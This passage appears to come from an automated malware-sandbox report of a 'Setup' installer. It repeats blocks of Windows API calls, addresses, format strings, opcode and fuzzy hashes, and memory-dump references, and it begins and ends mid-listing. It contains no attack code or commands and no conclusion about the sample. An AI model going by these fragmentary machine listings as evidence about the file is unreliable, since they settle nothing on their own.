                                                                                                                                         • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2568930968-0
                                                                                                                                        • Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                        • Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
                                                                                                                                        • Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                        • Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68
                                                                                                                                        APIs
                                                                                                                                        • GetDlgItem.USER32(?), ref: 004020A3
                                                                                                                                        • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                                                                        • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                                                                        • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                         • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1849352358-0
                                                                                                                                        • Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                        • Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
                                                                                                                                        • Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                        • Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
                                                                                                                                        APIs
                                                                                                                                        • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                                                                        • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                         • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$Timeout
                                                                                                                                        • String ID: !
                                                                                                                                        • API String ID: 1777923405-2657877971
                                                                                                                                        • Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                        • Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
                                                                                                                                        • Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                        • Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
                                                                                                                                        APIs
                                                                                                                                        • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                                                                                                                        • wsprintfW.USER32 ref: 00404483
                                                                                                                                        • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                         • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ItemTextlstrlenwsprintf
                                                                                                                                        • String ID: %u.%u%s%s
                                                                                                                                        • API String ID: 3540041739-3551169577
                                                                                                                                        • Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                                                        • Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
                                                                                                                                        • Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                                                        • Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                                                        • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                        Strings
                                                                                                                                        • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                                                        • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                                                        • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                                                                        • API String ID: 1697273262-1764544995
                                                                                                                                        • Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                        • Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
                                                                                                                                        • Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                        • Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                          • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                          • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                        • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                                                        • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                                                        • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                                                        • String ID: CopyFiles "%s"->"%s"
                                                                                                                                        • API String ID: 2577523808-3778932970
                                                                                                                                        • Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                        • Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
                                                                                                                                        • Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                        • Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrcatwsprintf
                                                                                                                                        • String ID: %02x%c$...
                                                                                                                                        • API String ID: 3065427908-1057055748
                                                                                                                                        • Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                        • Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
                                                                                                                                        • Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                        • Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794
                                                                                                                                        APIs
                                                                                                                                        • OleInitialize.OLE32(00000000), ref: 00405083
                                                                                                                                          • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                        • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                                                                        • String ID: Section: "%s"$Skipping section: "%s"
                                                                                                                                        • API String ID: 2266616436-4211696005
                                                                                                                                        • Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                        • Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
                                                                                                                                        • Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                        • Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD
                                                                                                                                        APIs
                                                                                                                                        • GetDC.USER32(?), ref: 00402100
                                                                                                                                        • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                                                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                                                          • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427976,759223A0,00000000), ref: 00406902
                                                                                                                                        • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                                                                                                                          • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1599320355-0
                                                                                                                                        • Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                                                        • Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
                                                                                                                                        • Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                                                        • Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                        • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                                                                                                                        • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
                                                                                                                                        • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                                                                        • String ID: Version
                                                                                                                                        • API String ID: 512980652-315105994
                                                                                                                                        • Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                        • Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
                                                                                                                                        • Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                        • Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1
APIs
• DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
• GetTickCount.KERNEL32 ref: 00403303
• CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
• ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
Memory Dump Source
• Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
Similarity
• API ID: Window$CountCreateDestroyDialogParamShowTick
• String ID:
• API String ID: 2102729457-0
• Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
• Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
• Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
• Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC
APIs
• GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
• GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
• GlobalFree.KERNEL32(00000000), ref: 004063CA
Memory Dump Source
• Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
Similarity
• API ID: Global$AddressAllocByteCharFreeMultiProcWide
• String ID:
• API String ID: 2883127279-0
• Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
• Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
• Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
• Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674
APIs
• IsWindowVisible.USER32(?), ref: 0040492E
• CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
  • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
Strings
Memory Dump Source
• Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
Similarity
• API ID: Window$CallMessageProcSendVisible
• String ID:
• API String ID: 3748168415-3916222277
• Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
• Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
• Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
• Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9
APIs
• GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
• lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
Strings
Memory Dump Source
• Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
Similarity
• API ID: PrivateProfileStringlstrcmp
• String ID: !N~
• API String ID: 623250636-529124213
• Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
• Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
• Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
• Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714
APIs
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
• CloseHandle.KERNEL32(?), ref: 00405C9D
Strings
• Error launching installer, xrefs: 00405C74
Memory Dump Source
• Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmp
